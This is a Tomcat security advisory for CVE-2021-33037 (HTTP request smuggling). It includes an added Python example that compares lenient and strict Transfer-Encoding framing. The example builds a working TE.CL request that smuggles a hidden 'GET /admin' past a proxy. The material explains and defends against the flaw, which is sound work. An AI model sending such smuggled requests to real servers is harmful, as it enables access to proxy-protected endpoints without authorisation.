From: Mark Thomas
Subject: [SECURITY] CVE-2021-33037 Apache Tomcat HTTP request smuggling
To: Tomcat Users List
Cc: announce@tomcat.apache.org, announce@apache.org, Tomcat Developers List
Date: Mon, 12 Jul 2021 14:04:33 +0100

CVE-2021-33037 HTTP request smuggling

Severity: Important

Vendor: The Apache Software Foundation

Versions Affected:
Apache Tomcat 10.0.0-M1 to 10.0.6
Apache Tomcat 9.0.0.M1 to 9.0.46
Apache Tomcat 8.5.0 to 8.5.66

Description:
Apache Tomcat did not correctly parse the HTTP Transfer-Encoding request header in some circumstances, leading to the possibility of request smuggling when used with a reverse proxy.
Specifically:
- Tomcat incorrectly ignored the Transfer-Encoding header if the client declared it would only accept an HTTP/1.0 response;
- Tomcat honoured the identity encoding; and
- Tomcat did not ensure that, if present, the chunked encoding was the final encoding.

In each of these cases a reverse proxy in front of Tomcat that applied the Transfer-Encoding header as RFC 7230 requires could frame the request body differently from Tomcat, and the bytes left over on the connection are then parsed as a further request.
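
The following is an added worked example and is not Tomcat's code or part of the original advisory. It models the three lenient behaviours listed above as one framing function, puts a strict RFC 7230 section 3.3.3 framing rule beside it, and shows how a Transfer-Encoding-honouring proxy and a lenient back end split the same bytes differently. The request bytes, the host name app.example, the paths and all function names are constructed for the example; the choices to refuse Transfer-Encoding on a non-HTTP/1.1 request line and to refuse a Content-Length sent alongside Transfer-Encoding are this example's, not a statement of what Tomcat's fix does.

```python
"""Added example for CVE-2021-33037, not Tomcat's code: the three lenient
Transfer-Encoding behaviours the advisory lists, a strict RFC 7230 3.3.3 framing
rule beside them, and how a TE-honouring proxy and a lenient back end split the
same bytes. All requests are constructed samples; nothing touches the network."""

def parse_head(raw: bytes):
    """-> (version, [(name, value), ...], bytes after the header block)."""
    head, _, rest = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    version = lines[0].decode("ascii").split(" ")[2]
    headers = []
    for line in lines[1:]:
        name, _, value = line.decode("ascii").partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return version, headers, rest

def transfer_codings(headers):
    """All Transfer-Encoding values, comma-split, trimmed, lower-cased, in order."""
    codings = []
    for name, value in headers:
        if name == "transfer-encoding":
            codings += [t.strip().lower() for t in value.split(",") if t.strip()]
    return codings

def content_length(headers):
    """int Content-Length, None if absent, ValueError if duplicated or non-numeric."""
    values = [v for n, v in headers if n == "content-length"]
    if not values:
        return None
    if len(set(values)) != 1 or not values[0].isdigit():
        raise ValueError("invalid Content-Length")
    return int(values[0])

def lenient_framing(version, headers):
    """Model of the pre-fix behaviour: (1) Transfer-Encoding ignored for an HTTP/1.0
    request line, (2) 'identity' honoured and framed by Content-Length,
    (3) 'chunked' accepted wherever it appears in the list."""
    codings = transfer_codings(headers)
    if version == "HTTP/1.0" or not codings or codings == ["identity"]:
        return ("length", content_length(headers) or 0)
    if "chunked" in codings:
        return ("chunked", None)
    return ("reject", "501 unsupported transfer coding")

def strict_framing(version, headers):
    """RFC 7230 3.3.3: Transfer-Encoding overrides Content-Length and chunked must be
    the single final coding. Rejecting Transfer-Encoding on a non-HTTP/1.1 request
    line, and a Content-Length next to Transfer-Encoding, are this example's choices."""
    codings = transfer_codings(headers)
    try:
        cl = content_length(headers)
    except ValueError as err:
        return ("reject", f"400 {err}")
    if not codings:
        return ("length", cl or 0)
    if version != "HTTP/1.1":
        return ("reject", "400 Transfer-Encoding on a non-HTTP/1.1 request")
    if codings[-1] != "chunked" or codings.count("chunked") != 1:
        return ("reject", "400 chunked must be the single final transfer coding")
    if cl is not None:
        return ("reject", "400 Transfer-Encoding and Content-Length both present")
    return ("chunked", None)

def consume_body(framing, data: bytes):
    """-> (body, leftover); leftover is what the parser treats as the next request."""
    mode, n = framing
    if mode == "reject":
        raise ValueError(n)
    if mode == "length":
        return data[:n], data[n:]
    body, pos = b"", 0                           # minimal chunked decoder
    while True:
        line_end = data.index(b"\r\n", pos)
        size = int(data[pos:line_end].split(b";")[0], 16)
        pos = line_end + 2
        if size == 0:
            while data[pos:pos + 2] != b"\r\n":  # skip trailer fields, if any
                pos = data.index(b"\r\n", pos) + 2
            return body, data[pos + 2:]
        body += data[pos:pos + size]
        pos += size + 2                          # chunk data plus its CRLF

# Constructed TE.CL sample for behaviour (1): HTTP/1.0 request line, a chunked body
# carrying a complete second request, and a Content-Length covering exactly the
# chunk-size line. Host name and paths are placeholders.
SMUGGLED = b"GET /admin HTTP/1.1\r\nHost: app.example\r\n\r\n"
SIZE_LINE = f"{len(SMUGGLED):x}\r\n".encode("ascii")
TE_CL_SAMPLE = (
    b"POST /upload HTTP/1.0\r\nHost: app.example\r\n"
    + f"Content-Length: {len(SIZE_LINE)}\r\n".encode("ascii")
    + b"Transfer-Encoding: chunked\r\n\r\n"
    + SIZE_LINE + SMUGGLED + b"\r\n0\r\n\r\n"
)

def split_views(raw: bytes):
    """(proxy_leftover, backend_leftover): the proxy applies chunked framing as
    RFC 7230 directs when Transfer-Encoding is present; the back end is lenient."""
    version, headers, data = parse_head(raw)
    _, proxy_left = consume_body(("chunked", None), data)
    _, back_left = consume_body(lenient_framing(version, headers), data)
    return proxy_left, back_left
```

Running split_views(TE_CL_SAMPLE) returns an empty proxy leftover (the proxy consumed the whole chunked body as one request) and a back-end leftover that begins with the GET /admin request, which the lenient back end then processes as a second request the proxy never saw. strict_framing rejects the same request up front, as it does "Transfer-Encoding: identity" with a Content-Length and "Transfer-Encoding: chunked, identity", the other two cases the advisory lists.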

Mitigation:
Users of the affected versions should apply one of the following mitigations:
- Upgrade to Apache Tomcat 10.0.7 or later
- Upgrade to Apache Tomcat 9.0.48 or later
- Upgrade to Apache Tomcat 8.5.68 or later

Note that the issue was fixed in 9.0.47 and 8.5.67 but the release votes for those versions did not pass.

History:
2021-07-12 Original advisory

References:
[1] https://tomcat.apache.org/security-10.html
[2] https://tomcat.apache.org/security-9.html
[3] https://tomcat.apache.org/security-8.html